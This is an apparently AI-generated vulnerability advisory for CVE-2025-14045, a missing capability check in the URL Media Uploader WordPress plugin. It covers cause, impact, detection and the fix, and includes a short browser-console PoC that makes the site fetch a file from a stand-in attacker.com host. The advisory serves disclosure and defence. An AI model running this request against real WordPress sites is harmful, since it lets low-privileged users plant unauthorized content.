
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14045 is a Missing Authorization vulnerability in the URL Media Uploader plugin for WordPress, affecting all versions up to and including 1.0.1. The flaw allows authenticated attackers with Contributor-level access or above to upload media files to the WordPress media library, bypassing the platform's standard permission model. It was discovered on November 26, 2025, by Jason Carle (jsonc) via responsible disclosure through Wordfence, and published on December 12, 2025. It carries a CVSS v3.1 base score of 4.3 (Medium) (Wordfence, Red Hat CVE).
The root cause is CWE-862 (Missing Authorization): the plugin's AJAX handler url_media_uploader_url_upload_ajax_handler() in url-media-uploader.php (lines 52–76) performs nonce verification but omits a capability check for upload_files before processing upload requests. The handler is registered only under wp_ajax_* (authenticated users), preventing unauthenticated exploitation, but any logged-in Contributor or higher can obtain a valid nonce from any admin page where the plugin's scripts are enqueued and then submit a crafted AJAX POST request to upload files from external URLs into the media library. The fix requires adding if (!current_user_can('upload_files')) { ... } immediately after the nonce check (GitHub Gist, Plugin Source).
Successful exploitation allows low-privileged authenticated users (Contributors) to upload media files to the WordPress media library, a capability normally restricted to Authors, Editors, and Administrators. While the vulnerability is limited to "safe" file uploads (not arbitrary code execution), it can be abused to inject unwanted or malicious-looking content into the media library, potentially enabling phishing assets, defacement material, or content that could be leveraged in further social engineering attacks. Confidentiality and availability are not directly impacted; the primary risk is unauthorized integrity modification of the site's media assets (Wordfence, GitHub Gist).
A public proof-of-concept (PoC) was published by the discoverer, Jason Carle, demonstrating exploitation via browser console JavaScript on any admin page where the plugin's scripts are loaded. The EPSS score is approximately 0.026% (very low), and there is no evidence of in-the-wild exploitation or inclusion in the CISA KEV catalog as of the time of reporting. Exploitation requires a valid WordPress account with at least Contributor role, making mass exploitation less likely but still a realistic risk on sites with open user registration (GitHub Gist, Wordfence).
/wp-content/plugins/url-media-uploader/ for plugin presence./wp-admin/post-new.php, /wp-admin/upload.php). Open the browser developer console and extract the nonce: var nonce = urlMediaUploader.nonce; var ajaxUrl = urlMediaUploader.ajax_url;jQuery.ajax({
url: ajaxUrl,
type: 'POST',
data: {
action: 'url_media_uploader_url_upload',
url: 'https://attacker.com/malicious-image.jpg',
nonce: nonce
},
success: function(response) { console.log(response); }
});/wp-admin/upload.php using the returned attachment_id (GitHub Gist)./wp-admin/admin-ajax.php with action=url_media_uploader_url_upload from Contributor-level user accounts; repeated or automated requests to this endpoint from a single user or IP.wp-content/uploads/ that were sourced from external URLs not associated with normal site operations; files uploaded by user accounts with Contributor role.wp_posts table for post_type='attachment' entries authored by Contributors.Update the URL Media Uploader plugin to version 1.0.2 or later, which adds the required current_user_can('upload_files') capability check to the AJAX handler. If an immediate update is not possible, site administrators can deactivate or remove the plugin as a temporary workaround. Additionally, review the WordPress media library for any files uploaded by Contributor-level accounts and remove unauthorized content (Wordfence, GitHub Gist).
The vulnerability was responsibly disclosed by Jason Carle through Wordfence on November 26, 2025, and Wordfence published the advisory upon CVE assignment in December 2025. No significant broader media coverage or notable community debate has been identified beyond the standard vulnerability disclosure process (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."